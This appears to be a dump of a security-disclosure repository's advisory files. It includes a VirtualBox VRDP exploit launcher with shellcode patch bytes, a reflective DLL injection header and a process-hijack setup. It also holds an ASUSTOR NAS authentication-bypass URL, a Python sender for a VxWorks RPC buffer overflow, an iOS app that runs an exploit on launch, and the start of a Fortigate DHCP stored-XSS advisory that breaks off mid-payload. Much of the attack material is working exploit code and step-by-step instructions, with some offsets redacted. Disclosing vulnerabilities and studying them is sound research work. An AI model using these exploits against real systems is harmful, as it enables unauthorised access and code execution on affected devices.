1 | #include
2 | #include
3 | #include
4 |
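/*
 * Look up the process ID of the first running process whose image file name
 * matches `name` (compared case-insensitively).
 *
 * Returns the PID, or 0 when `name` is NULL, the process snapshot could not be
 * taken, or no process with that image name is running. A diagnostic line is
 * printed in every case.
 */
DWORD
GetPidByName(PCHAR name) {
    PROCESSENTRY32 entry;
    HANDLE snapshot;
    DWORD pid = 0;

    /* _stricmp() and "%s" both dereference name; refuse a NULL lookup early. */
    if (name == NULL) {
        return 0;
    }

    entry.dwSize = sizeof(PROCESSENTRY32);

    snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    /* On failure the API returns INVALID_HANDLE_VALUE, not NULL. */
    if (snapshot == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to get PID of %s\n", name);
        return 0;
    }

    if (Process32First(snapshot, &entry)) {
        do {
            if (!_stricmp(entry.szExeFile, name)) {
                pid = entry.th32ProcessID;
                break;
            }
        } while (Process32Next(snapshot, &entry));
    }

    /* The snapshot is a kernel object and must be released on every path. */
    CloseHandle(snapshot);

    if (pid != 0) {
        /* DWORD is unsigned; %d would misreport PIDs with the high bit set. */
        printf("[*] PID: %lu\n", (unsigned long)pid);
    } else {
        printf("[-] Failed to get PID of %s\n", name);
    }
    return pid;
}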
24 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/ReflectiveDLLInjection.h:
--------------------------------------------------------------------------------
1 | //===============================================================================================//
2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
3 | // All rights reserved.
4 | //
5 | // Redistribution and use in source and binary forms, with or without modification, are permitted
6 | // provided that the following conditions are met:
7 | //
8 | // * Redistributions of source code must retain the above copyright notice, this list of
9 | // conditions and the following disclaimer.
10 | //
11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of
12 | // conditions and the following disclaimer in the documentation and/or other materials provided
13 | // with the distribution.
14 | //
15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to
16 | // endorse or promote products derived from this software without specific prior written permission.
17 | //
18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 | //===============================================================================================//
28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
30 | //===============================================================================================//
31 | #define WIN32_LEAN_AND_MEAN
32 | #include
33 |
34 | // we declare some common stuff in here...
35 |
36 | #define DLL_METASPLOIT_ATTACH 4
37 | #define DLL_METASPLOIT_DETACH 5
38 | #define DLL_QUERY_HMODULE 6
39 |
40 | #define DEREF( name )*(UINT_PTR *)(name)
41 | #define DEREF_64( name )*(DWORD64 *)(name)
42 | #define DEREF_32( name )*(DWORD *)(name)
43 | #define DEREF_16( name )*(WORD *)(name)
44 | #define DEREF_8( name )*(BYTE *)(name)
45 |
46 | typedef ULONG_PTR(WINAPI * REFLECTIVELOADER)(VOID);
47 | typedef BOOL(WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID);
48 |
49 | #define DLLEXPORT __declspec( dllexport )
50 |
51 | //===============================================================================================//
52 | #endif
53 | //===============================================================================================//
54 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/_Constants.c:
--------------------------------------------------------------------------------
1 | #include
2 |
3 | /******************************************************************************
4 | * Exploit's constants - if something does not work, review these first
5 | ******************************************************************************/
6 |
7 | /********** Launcher constants **********/
8 |
9 | CHAR gDriverName[] = "vrdpexploit.sys";
10 | CHAR gDeviceName[] = "\\??\\vrdpexploit";
11 | DWORD gIoctlEscalate = CTL_CODE(0x8000, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS); /* 0x80002000 */
12 | DWORD gIoctlExploit = CTL_CODE(0x8000, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS); /* 0x80002004 */
13 |
14 | CHAR gDwmName[] = "dwm.exe";
15 | CHAR gHijackerName[] = "hostid_hijacker.dll";
16 | CHAR gSuspendCommand[] = "pssuspend64.exe -nobanner dwm.exe";
17 | CHAR gResumeCommand[] = "pssuspend64.exe -nobanner -r dwm.exe";
18 |
19 | /********** Host ID Hijacker constants **********/
20 |
21 | CHAR launcherProcessName[] = "vrdpexploit_launcher.exe";
22 |
23 | BYTE gPatch[] =
24 | "\xE8\x00\x00\x00\x00" // call $5
25 | "\x58" // pop rax
26 | "\x48\x83\xE8\x05" // sub rax, 5
27 | "\x50" // push rax
28 | "\x48\xB8\x41\x41\x41\x41\x41\x41\x41\x41" // mov rax, 0x4141414141414141
29 | "\x50" // push rax
30 | "\xC3"; // ret
31 |
32 | // Workaround to define a "constant" instead of #define PATCH_SIZE
33 | // in several files.
34 | enum patch_size {
35 | patchSize = 23,
36 | };
37 | enum patch_size gPatchSize = patchSize;
38 |
39 | // Offset from gPatch to a shellcode address of command "mov rax, ..."
40 | ULONGLONG gPatchShellcodeAddrOffset = ???; // Removed for the sake of PoC
41 |
42 | // Offset inside vboxWddmDDevPresent where gPatch will be copied
43 | ULONGLONG gPatchOffset = ???; // Removed for the sake of PoC
44 |
45 | BYTE gSavedBytes[patchSize];
46 |
47 | const DWORD gLastValidHostId = 100;
48 |
49 | /******************************************************************************
50 | * End of exploit's constants
51 | ******************************************************************************/
52 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/vrdpexploit_launcher.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 | Header Files
23 |
24 |
25 |
26 |
27 | Source Files
28 |
29 |
30 | Source Files
31 |
32 |
33 | Header Files
34 |
35 |
36 | Source Files
37 |
38 |
39 | Source Files
40 |
41 |
42 | Source Files
43 |
44 |
45 | Source Files
46 |
47 |
48 | Source Files
49 |
50 |
51 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/vrdpexploit_launcher.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/SSD Advisory - 3747/readme.md:
--------------------------------------------------------------------------------
1 | **Vulnerability Summary**
2 | An ASUSTOR NAS or network attached storage is “a computer appliance built from the ground up for storing and serving files. It attaches directly to a network, allowing those on the network to access and share files from a central location”. In the following advisory we will discuss a vulnerability found inside ASUSTOR NAS which lets anonymous attackers bypass the product's authentication requirement.
3 |
4 | **Credit**
5 | An independent security researcher, Ahmed Y. Elmogy, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
6 |
7 | **Affected systems**
8 | ASUSTOR NAS devices running ADM version 3.0.5.RDU1 and prior
9 |
10 | **Vulnerability Details**
11 | The vulnerability lies in the web interface of ASUSTOR NAS, in the file located at /initial/index.cgi, which is responsible for initializing the device with your ASUSTOR ID. The problem is that this file remains available even after the first initialization, and it doesn’t require any authentication at all.
12 | So by abusing /initial/index.cgi?act=register, you’ll be logged in with the administrator privileges without any kind of authentication.
13 |
14 | **How to Exploit**
15 | Visit:
16 | `http://:/initial/index.cgi?act=register`
17 | (Port will probably be 8800)
18 | Check “Register later”, click on next, and press the “Start” button. You’ll be redirected to /portal/index.cgi with a sid parameter, bypassing the authentication, and accessing the web interface with admin privileges.
19 |
--------------------------------------------------------------------------------
/SSD Advisory - 3904/readme.md:
--------------------------------------------------------------------------------
1 | **Vulnerability Summary**
2 | The following advisory describes a vulnerability found in the Remote Procedure Call (RPC) component of the VxWorks real-time Operating System, which suffers from a buffer overflow; this buffer overflow can be exploited to cause the component to execute arbitrary code.
3 |
4 | **CVE**
5 | CVE-2019-9865
6 |
7 | **Credit**
8 | An independent Security Researcher, Yu Zhou, has reported this vulnerability to SSD Secure Disclosure program.
9 |
10 | **Affected systems**
11 | VxWorks OS version 6.6
12 |
13 | **Vendor Response**
14 | “We’ve gone through our supported versions of VxWorks and found the versions affected are 6.9 before 6.9.1. We released the update to our customers today. Except in special circumstances, we only release statements and fixes for supported products. We know you found this vulnerability in an unsupported version of VxWorks. We won’t have a code update for that, but a mitigation is to disable CONFIG_RPC. This will be published in NVD as CVE-2019-9865. It should be public shortly. Thank you for working with us to resolve this problem. We hope to work with you in the future if you have found other vulnerabilities, and we may have other questions for you.”
15 |
16 | **Vulnerability Details**
17 | As previously mentioned, the vulnerability is inside the RPC component. The vulnerable function which contains the buffer overflow is _svcauth_unix. At _svcauth_unix + 0x67, it reads the value 0xffffffff from the malicious packet (the content is shown later).
18 |
19 |
20 |
21 | Afterwards, the cmp eax, 0FFh checks whether the value (packet content size) is greater than 255 without considering that the value may be negative. The value 0xffffffff is then used as the third parameter (nbytes) of the bcopy function, which finally causes a buffer overflow.
22 |
23 |
24 |
25 | This is the packet that will be sent to the RPC Service:
26 |
27 |
28 |
29 | **Exploit**
30 | ```python
import socket

host = "192.168.15.199"
rpcPort = 111

# "pkt" holds the raw bytes that are written to the RPC port unchanged.
with open("pkt", 'rb') as pkt_file:
    data = pkt_file.read()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, rpcPort))
sock.send(data)
sock.close()
44 | ```
45 |
46 |
47 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend (code)/AppDelegate.h:
--------------------------------------------------------------------------------
1 | //
2 | // AppDelegate.h
3 | // powend
4 | //
5 | // Created by simo on 30/08/2018.
6 | // Copyright © 2018 simo ghannam. All rights reserved.
7 | //
8 |
9 | #import
10 |
11 | @interface AppDelegate : UIResponder
12 |
13 | @property (strong, nonatomic) UIWindow *window;
14 |
15 |
16 | @end
17 |
18 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend (code)/AppDelegate.m:
--------------------------------------------------------------------------------
1 | //
2 | // AppDelegate.m
3 | // powend
4 | //
5 | // Created by simo on 30/08/2018.
6 | // Copyright © 2018 simo ghannam. All rights reserved.
7 | //
8 |
9 | #import "AppDelegate.h"
10 | #import "code.h"
11 |
12 | @interface AppDelegate ()
13 |
14 | @end
15 |
@implementation AppDelegate

#pragma mark - UIApplicationDelegate

- (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions {
    // The PoC has no interactive UI: the routine declared in code.h runs as
    // soon as the process has finished launching.
    //do_powend();
    start_exploit();
    return YES;
}

- (void)applicationWillResignActive:(UIApplication *)application {
    // Active -> inactive transition (e.g. an interruption or the user leaving).
    // Nothing is paused here.
}

- (void)applicationDidEnterBackground:(UIApplication *)application {
    // Background entry: no shared resources or state to persist.
}

- (void)applicationWillEnterForeground:(UIApplication *)application {
    // Background -> active transition: nothing was torn down on backgrounding.
}

- (void)applicationDidBecomeActive:(UIApplication *)application {
    // Nothing was paused in applicationWillResignActive:, so nothing to resume.
}

- (void)applicationWillTerminate:(UIApplication *)application {
    // No state to save on termination.
}

@end
55 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend (code)/Assets.xcassets/AppIcon.appiconset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "idiom" : "iphone",
5 | "size" : "20x20",
6 | "scale" : "2x"
7 | },
8 | {
9 | "idiom" : "iphone",
10 | "size" : "20x20",
11 | "scale" : "3x"
12 | },
13 | {
14 | "idiom" : "iphone",
15 | "size" : "29x29",
16 | "scale" : "2x"
17 | },
18 | {
19 | "idiom" : "iphone",
20 | "size" : "29x29",
21 | "scale" : "3x"
22 | },
23 | {
24 | "idiom" : "iphone",
25 | "size" : "40x40",
26 | "scale" : "2x"
27 | },
28 | {
29 | "idiom" : "iphone",
30 | "size" : "40x40",
31 | "scale" : "3x"
32 | },
33 | {
34 | "idiom" : "iphone",
35 | "size" : "60x60",
36 | "scale" : "2x"
37 | },
38 | {
39 | "idiom" : "iphone",
40 | "size" : "60x60",
41 | "scale" : "3x"
42 | },
43 | {
44 | "idiom" : "ipad",
45 | "size" : "20x20",
46 | "scale" : "1x"
47 | },
48 | {
49 | "idiom" : "ipad",
50 | "size" : "20x20",
51 | "scale" : "2x"
52 | },
53 | {
54 | "idiom" : "ipad",
55 | "size" : "29x29",
56 | "scale" : "1x"
57 | },
58 | {
59 | "idiom" : "ipad",
60 | "size" : "29x29",
61 | "scale" : "2x"
62 | },
63 | {
64 | "idiom" : "ipad",
65 | "size" : "40x40",
66 | "scale" : "1x"
67 | },
68 | {
69 | "idiom" : "ipad",
70 | "size" : "40x40",
71 | "scale" : "2x"
72 | },
73 | {
74 | "idiom" : "ipad",
75 | "size" : "76x76",
76 | "scale" : "1x"
77 | },
78 | {
79 | "idiom" : "ipad",
80 | "size" : "76x76",
81 | "scale" : "2x"
82 | },
83 | {
84 | "idiom" : "ipad",
85 | "size" : "83.5x83.5",
86 | "scale" : "2x"
87 | },
88 | {
89 | "idiom" : "ios-marketing",
90 | "size" : "1024x1024",
91 | "scale" : "1x"
92 | }
93 | ],
94 | "info" : {
95 | "version" : 1,
96 | "author" : "xcode"
97 | }
98 | }
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend (code)/Assets.xcassets/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "info" : {
3 | "version" : 1,
4 | "author" : "xcode"
5 | }
6 | }
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend (code)/Base.lproj/LaunchScreen.storyboard:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend (code)/Base.lproj/Main.storyboard:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend (code)/Info.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | CFBundleDevelopmentRegion
6 | $(DEVELOPMENT_LANGUAGE)
7 | CFBundleExecutable
8 | $(EXECUTABLE_NAME)
9 | CFBundleIdentifier
10 | $(PRODUCT_BUNDLE_IDENTIFIER)
11 | CFBundleInfoDictionaryVersion
12 | 6.0
13 | CFBundleName
14 | $(PRODUCT_NAME)
15 | CFBundlePackageType
16 | APPL
17 | CFBundleShortVersionString
18 | 1.0
19 | CFBundleVersion
20 | 1
21 | LSRequiresIPhoneOS
22 |
23 | UILaunchStoryboardName
24 | LaunchScreen
25 | UIMainStoryboardFile
26 | Main
27 | UIRequiredDeviceCapabilities
28 |
29 | armv7
30 |
31 | UISupportedInterfaceOrientations
32 |
33 | UIInterfaceOrientationPortrait
34 | UIInterfaceOrientationLandscapeLeft
35 | UIInterfaceOrientationLandscapeRight
36 |
37 | UISupportedInterfaceOrientations~ipad
38 |
39 | UIInterfaceOrientationPortrait
40 | UIInterfaceOrientationPortraitUpsideDown
41 | UIInterfaceOrientationLandscapeLeft
42 | UIInterfaceOrientationLandscapeRight
43 |
44 |
45 |
46 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend (code)/ViewController.h:
--------------------------------------------------------------------------------
1 | //
2 | // ViewController.h
3 | // powend
4 | //
5 | // Created by simo on 30/08/2018.
6 | // Copyright © 2018 simo ghannam. All rights reserved.
7 | //
8 |
9 | #import
10 |
11 | @interface ViewController : UIViewController
12 |
13 |
14 | @end
15 |
16 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend (code)/ViewController.m:
--------------------------------------------------------------------------------
1 | //
2 | // ViewController.m
3 | // powend
4 | //
5 | // Created by simo on 30/08/2018.
6 | // Copyright © 2018 simo ghannam. All rights reserved.
7 | //
8 |
9 | #import "ViewController.h"
10 |
11 | @interface ViewController ()
12 |
13 | @end
14 |
@implementation ViewController

#pragma mark - View lifecycle

- (void)viewDidLoad {
    [super viewDidLoad];
    // The view comes straight from the storyboard; no programmatic setup.
}

- (void)didReceiveMemoryWarning {
    [super didReceiveMemoryWarning];
    // Nothing is cached here that could be dropped and rebuilt later.
}

@end
30 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend (code)/main.m:
--------------------------------------------------------------------------------
1 | //
2 | // main.m
3 | // powend
4 | //
5 | // Created by simo on 30/08/2018.
6 | // Copyright © 2018 simo ghannam. All rights reserved.
7 | //
8 |
9 | #import
10 | #import "AppDelegate.h"
11 |
/// Process entry point: hands control to the UIKit run loop with AppDelegate
/// as the application delegate class.
int main(int argc, char * argv[]) {
    @autoreleasepool {
        NSString *delegateClassName = NSStringFromClass([AppDelegate class]);
        return UIApplicationMain(argc, argv, nil, delegateClassName);
    }
}
17 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend (code)/powend.entitlements:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | com.apple.security.application-groups
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend.xcodeproj/project.xcworkspace/contents.xcworkspacedata:
--------------------------------------------------------------------------------
1 |
2 |
4 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | IDEDidComputeMac32BitWarning
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend.xcodeproj/project.xcworkspace/xcuserdata/simo.xcuserdatad/UserInterfaceState.xcuserstate:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 3944/powend.xcodeproj/project.xcworkspace/xcuserdata/simo.xcuserdatad/UserInterfaceState.xcuserstate
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend.xcodeproj/xcuserdata/simo.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 |
8 |
20 |
21 |
22 |
24 |
36 |
37 |
38 |
40 |
52 |
53 |
54 |
56 |
66 |
67 |
68 |
69 |
70 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend.xcodeproj/xcuserdata/simo.xcuserdatad/xcschemes/xcschememanagement.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | SchemeUserState
6 |
7 | powend.xcscheme
8 |
9 | orderHint
10 | 0
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powendTests/Info.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | CFBundleDevelopmentRegion
6 | $(DEVELOPMENT_LANGUAGE)
7 | CFBundleExecutable
8 | $(EXECUTABLE_NAME)
9 | CFBundleIdentifier
10 | $(PRODUCT_BUNDLE_IDENTIFIER)
11 | CFBundleInfoDictionaryVersion
12 | 6.0
13 | CFBundleName
14 | $(PRODUCT_NAME)
15 | CFBundlePackageType
16 | BNDL
17 | CFBundleShortVersionString
18 | 1.0
19 | CFBundleVersion
20 | 1
21 |
22 |
23 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powendTests/powendTests.m:
--------------------------------------------------------------------------------
1 | //
2 | // powendTests.m
3 | // powendTests
4 | //
5 | // Created by simo on 30/08/2018.
6 | // Copyright © 2018 simo ghannam. All rights reserved.
7 | //
8 |
9 | #import
10 |
11 | @interface powendTests : XCTestCase
12 |
13 | @end
14 |
@implementation powendTests

#pragma mark - Fixture

- (void)setUp {
    [super setUp];
    // Runs before every test method; no per-test state is needed yet.
}

- (void)tearDown {
    // Runs after every test method; nothing to release.
    [super tearDown];
}

#pragma mark - Tests

- (void)testExample {
    // Placeholder functional test from the Xcode template; asserts nothing.
}

- (void)testPerformanceExample {
    // Placeholder performance test; the measured block is intentionally empty.
    [self measureBlock:^{
    }];
}

@end
40 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powendUITests/Info.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | CFBundleDevelopmentRegion
6 | $(DEVELOPMENT_LANGUAGE)
7 | CFBundleExecutable
8 | $(EXECUTABLE_NAME)
9 | CFBundleIdentifier
10 | $(PRODUCT_BUNDLE_IDENTIFIER)
11 | CFBundleInfoDictionaryVersion
12 | 6.0
13 | CFBundleName
14 | $(PRODUCT_NAME)
15 | CFBundlePackageType
16 | BNDL
17 | CFBundleShortVersionString
18 | 1.0
19 | CFBundleVersion
20 | 1
21 |
22 |
23 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powendUITests/powendUITests.m:
--------------------------------------------------------------------------------
1 | //
2 | // powendUITests.m
3 | // powendUITests
4 | //
5 | // Created by simo on 30/08/2018.
6 | // Copyright © 2018 simo ghannam. All rights reserved.
7 | //
8 |
9 | #import
10 |
11 | @interface powendUITests : XCTestCase
12 |
13 | @end
14 |
@implementation powendUITests

#pragma mark - Fixture

- (void)setUp {
    [super setUp];

    // Stop at the first failure: later UI steps would only cascade from it.
    self.continueAfterFailure = NO;

    // Each test gets a freshly launched instance of the app under test.
    XCUIApplication *app = [[XCUIApplication alloc] init];
    [app launch];

    // Any initial state the tests depend on (e.g. orientation) belongs here.
}

- (void)tearDown {
    // Nothing to release after each test.
    [super tearDown];
}

#pragma mark - Tests

- (void)testExample {
    // Placeholder UI test from the Xcode template; asserts nothing.
}

@end
41 |
--------------------------------------------------------------------------------
/SSD Advisory - 3987/readme.md:
--------------------------------------------------------------------------------
1 | # SSD Advisory - Fortigate DHCP Stored XSS
2 |
3 | **Vulnerability Summary**
4 | The following advisory describes a Stored XSS vulnerability found in Fortinet's Fortigate Firewall (FortiOS), triggered via an unauthenticated DHCP packet.
5 |
6 | **CVE**
7 | CVE-2019-6697
8 |
9 | **Credit**
10 | An independent Security Researcher, Toshitsugu Yoneyama, has reported this vulnerability to SSD Secure Disclosure program.
11 |
12 | **Affected systems**
13 | FortiOS v6.0.4 build 0231.
14 |
15 | **Vendor Response**
16 | Fortigate has fixed the vulnerability in FortiOS version 6.2.2
17 |
18 | **Vulnerability Details**
19 | An unauthenticated attacker can trigger a Stored XSS vulnerability via a malicious DHCP packet in the Fortigate DHCP Monitor. This is possible when Device Detection is enabled under Network > Interface > Edit Interface > Device Detection.
20 |
21 | 
22 | When this option is enabled the attacker may perform the following steps in order to exploit the vulnerability:
23 |
24 | 1. Install dhtest or any other tool that can send arbitrary DHCP packets.
25 | (https://sargandh.wordpress.com/2012/02/23/linux-dhcp-client-simulation-tool/)
26 | 2. Send a malicious DHCP packet. For example:
27 |
28 | ```
29 | #./dhtest-master/dhtest -i eth0 -m 12:34:56:78:90:12 -h "x